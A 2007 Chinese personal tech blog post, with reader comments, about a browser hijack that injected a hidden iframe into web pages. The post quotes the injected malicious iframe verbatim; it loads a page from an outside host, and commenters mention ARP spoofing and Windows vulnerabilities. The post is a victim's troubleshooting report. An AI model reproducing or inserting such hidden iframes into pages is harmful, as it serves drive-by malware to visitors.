eygle.com   eygle.com
eygle.com  
 

« ChinaCache(北京蓝汛)招聘DBA | Blog首页 | DBA Scripts:获得跟踪文件名称的gettrcname.sql »

有多少病毒可以再来-记大战7y7.us

作者:eygle |【转载时请务必以超链接形式标明文章和作者信息及本声明
链接:
站内相关文章|Related Articles
  • 微软发布 Windows XP SP3 补丁包
  • peer.exe 进程是什么?
  • WLLoginProxy.exe进程的作用及清除
  • Xp中关闭移动硬盘/U盘自动播放的方法
  • wmiprvse.exe进程是什么?

    • 今天莫名其妙的就感染了一个病毒,恩,确切的说,是半个病毒。
    Norton根本没有报病毒,但是我已经发现了问题,而其他同时的病毒防护却是不停的在报警。

    报告的病毒是Trojan.Anicmoo,而我的计算机主要问题在于浏览器被"劫持"
    在浏览网页时,部分网页被嵌入了一层iframe,代码如下:
    <iframe style='display:none' src=http://7y7.us/1.htm></iframe>

    在Google中发现了很多类似的报告,有人说firefox可以免疫,但是我的firefox同样中招,而且网上给出的解决方案一律无效。

    这是我重装机器以来第一次这么迅速的被病毒感染。

    尝试了很多方法,一律无效,于是干脆我选择放弃了,用Word总没问题吧。
    恩,于是重新修订了新书的第一章。

    结果,17:00左右,同事报告,病毒走了。
    倒,什么叫走了?

    我打开IE一看,果然好了。

    原来这个病毒可能是定时的?

    有人遇到过这个病毒没有?这个7y7.us在网上有很多案例,但是已有的解决方案在我这里都没有用,还有谁曾经和这个问题战斗过么?交流一点经验。

    -The End-

    By eygle on 2007-05-14 17:17 | Comments (14) | Posted to Windows | Edit |Pageviews:

    相关文章 随机文章
  • 微软发布 Windows XP SP3 补丁包
  • peer.exe 进程是什么?
  • WLLoginProxy.exe进程的作用及清除
  • Xp中关闭移动硬盘/U盘自动播放的方法
  • wmiprvse.exe进程是什么?
    		•  深入理解数据库创建-补遗
    奥运会、抵制 与 anti-cnn
    2008 新年快乐
    控制文件的SECTION 11是什么?
    Xp中关闭移动硬盘/U盘自动播放的方法
    网上相关主题:
    Google

    留言 (14)

    第一次听说还有自己来自己走的病毒!

    Posted by: ruochen0926 at May 14, 2007 9:20 PM

    我家里的机器现在都是用ghost,一有病毒就恢复,一两分钟就好^_^现在浏览器下载漏洞太多,经常去一些搜索出来的网站时中招,每次清理要该一堆的注册表,不胜其烦

    Posted by: NinGoo at May 14, 2007 9:25 PM

    这个所谓的病毒只是感染web服务器,是你公司的代理服务器中招了,所有通过这个代理访问web的机器都会出现你说的现象。

    Posted by: zhangyong at May 15, 2007 8:48 AM

    不会代理中招,我们的代理是Linux服务器,而且并非所有机器都有问题。

    Posted by: eygle at May 15, 2007 10:50 AM

    这中病毒我也遇到过,但没杀就好了,不知道为什么

    Posted by: Rumsfeld at May 15, 2007 11:19 AM

    推荐使用卡巴斯基进行处理,我的电脑五一前中招,搞了两天,然后彻底重做了。重装之后,按照常龙的推荐使用卡巴斯基,目前看来很好。

    Posted by: qinminglei at May 15, 2007 11:35 AM

    有人装了卡巴也不管用,我还是Norton吧。

    Posted by: eygle at May 15, 2007 11:46 AM

    电脑随便借给同事用,不安全啊

    Posted by: jacky at May 15, 2007 2:17 PM

    这个病毒会进行ARP欺骗,进而影响局域网的其它机器,病毒是利用MS06-014 ,MS07-017系统漏洞来攻击的!病毒自走自来可能是中毒的主机关机了,产生不了ARP欺骗包!!!所以.....

    Posted by: bobhe2007 at May 16, 2007 12:28 PM

    这个病毒会进行ARP欺骗,进而影响局域网的其它机器,病毒是利用MS06-014 ,MS07-017系统漏洞来攻击的!病毒自走自来可能是中毒的主机关机了,产生不了ARP欺骗包!!!所以.....

    Posted by: bobhe2007 at May 16, 2007 12:30 PM

    http://hi.baidu.com/czkuka/blog/item/911517b32399dca6d8335a66.html
    我公司网络也碰到这个问题,写一点解决的办法

    Posted by: kuka at May 16, 2007 2:59 PM

    木马的倾向,主叫关闭,然后就停了

    Posted by: ricky at May 16, 2007 4:46 PM

    其实 我说了 那种 病毒我能解决的 你不用重的撒 呵呵 真的可以 我在我的研究所 就是负责网络安全的撒

    Posted by: 柯星 at May 18, 2007 4:41 PM

    还有这样的病毒……
    挥一挥衣袖,不带走一个文件~

    Posted by: 溜达溜达 at May 19, 2007 8:44 PM

    发表留言:



    Remember Me?
    (输入验证码后方可评论,谢谢支持)


    CopyRight © 2004 eygle.com, All rights reserved.